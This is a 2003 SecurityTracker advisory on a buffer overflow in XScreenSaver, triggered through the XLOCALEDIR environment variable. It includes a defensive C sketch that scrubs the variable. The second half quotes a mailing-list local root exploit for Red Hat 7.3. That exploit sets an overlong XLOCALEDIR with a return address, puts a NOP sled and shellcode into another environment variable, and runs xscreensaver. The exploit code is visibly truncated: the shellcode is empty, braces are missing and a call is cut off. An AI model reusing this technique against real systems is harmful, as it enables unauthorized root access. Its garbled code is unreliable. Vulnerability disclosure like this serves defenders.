


Category:   Application (Generic)  >   XScreenSaver
Vendors:   Zawinski, Jamie
XScreenSaver Buffer Overflow May Let Local Users Obtain Root Privileges
SecurityTracker Alert ID:  1006235
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 7 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Presumed to be 4.08 and prior versions [but that was not stated in the report]
Description:   A buffer overflow vulnerability was reported in XScreenSaver. A local user may be able to obtain root privileges on the system.

It is reported that a local user can set the XLOCALEDIR environment variable to a specially crafted value and then run XScreenSaver to cause arbitrary code to be executed with root privileges.

Impact:   A local user can cause arbitrary code to be executed with root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
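
Since no fix was available, one mitigation for a privileged program is to scrub XLOCALEDIR before any library code reads it. The sketch below is an added example, not code from the advisory or from XScreenSaver; the function names, the 1024-byte limit and the path policy are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Assumed policy (not from the advisory): an acceptable locale directory is
 * an absolute path of printable ASCII no longer than max_len bytes. */
static int env_path_is_sane(const char *value, size_t max_len)
{
    size_t i;

    if (value[0] != '/')
        return 0;
    for (i = 0; value[i] != '\0'; i++) {
        unsigned char c = (unsigned char)value[i];
        if (i >= max_len || c < 0x20 || c > 0x7e)
            return 0;               /* oversized or non-printable */
    }
    return 1;
}

/* True when the process runs with more privilege than its invoker
 * (setuid or setgid binary). */
int running_privileged(void)
{
    return geteuid() != getuid() || getegid() != getgid();
}

/* Remove XLOCALEDIR when the process is privileged (never trust it there)
 * or when its value fails the policy. Returns 1 if the variable was
 * removed, 0 if it was absent or kept, -1 if unsetenv failed. */
int scrub_xlocaledir(int privileged, size_t max_len)
{
    const char *value = getenv("XLOCALEDIR");

    if (value == NULL)
        return 0;
    if (!privileged && env_path_is_sane(value, max_len))
        return 0;
    return unsetenv("XLOCALEDIR") == 0 ? 1 : -1;
}

int main(void)
{
    /* 1024 is an assumed limit; call this before any X library code runs. */
    int removed = scrub_xlocaledir(running_privileged(), 1024);

    printf("XLOCALEDIR %s\n", removed == 1 ? "removed" : "left as is");
    return 0;
}
```
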

 Source Message Contents

Subject:  xscreensaver exploit for Redhat 7.3

I think you don't need other comments:

** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
** deka is leet brother, thank you :>
** MAIL:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] =

int main()
        char buf[4076];
        unsigned long retaddr = RETADDR;

        memset(buf, 0x0, 4076);
        memset(buf, 0x41, 4072);
        memcpy(buf+2076, &retaddr, 0x4);
        setenv("XLOCALEDIR", buf, 1);
        memset(buf, 0x90, 4072);
        memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
        setenv("HAXHAX", buf, 1);
        execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);

